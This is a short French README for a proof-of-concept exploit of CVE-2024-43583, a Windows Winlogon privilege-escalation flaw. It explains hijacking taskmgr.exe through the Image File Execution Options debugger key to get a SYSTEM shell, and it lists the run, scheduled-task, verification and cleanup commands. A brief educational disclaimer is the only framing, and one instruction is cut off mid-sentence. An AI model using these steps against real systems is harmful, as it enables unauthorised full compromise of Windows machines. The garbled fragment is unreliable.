
Proof of Concept for CVE-2024-43583
Auteur : No0B@ckSappi3 Instagram : No0BackSappi3
CVE-2024-43583 est une vulnérabilité d'élévation de privilèges affectant le composant Winlogon de Microsoft. L'exploitation de cette faille permet à un utilisateur à faibles privilèges d'élever ses privilèges à SYSTEM, entraînant une compromission totale du système.
Cette preuve de concept (PoC) exploite le Détournement de débogueur via la clé de registre Windows Options d'exécution de fichier image (IFEO) pour remplacer un processus système légitime par une charge utile malveillante.
Versions Windows affectées
Windows 10 (1507 - 22H2) Windows 11 (21H2 - 24H2) Windows Server 2008 SP2 - 2022
Cet exploit est à des fins éducatives et de recherche uniquement. Ne l'utilisez pas sur des systèmes non autorisés. Une mauvaise utilisation de cet exploit peut être illégale.
Assurez-vous que Python est installé sur le système cible. Sinon, utilisez la version compilée .exe.
python poc-43583.py
schtasks /create /tn "LowPrivExploit" /tr "C:\Path\To\python.exe C:\Path\To\poc-43583.py" /sc once /st 00:00 /ru lowpriv /f
schtasks /run /tn "LowPrivExploit"
Ctrl + Maj + Échap). En cas de succès, un shell SYSTEM apparaîtra à la place.Une fois l'exploit exécuté, vérifiez vos privilèges :
whoami
Sortie attendue :
nt authority\system
Réexécutez le script et sélectionnez l'option [2] pour supprimer le détournement.
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f
schtasks /delete /tn "LowPrivExploit" /f
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"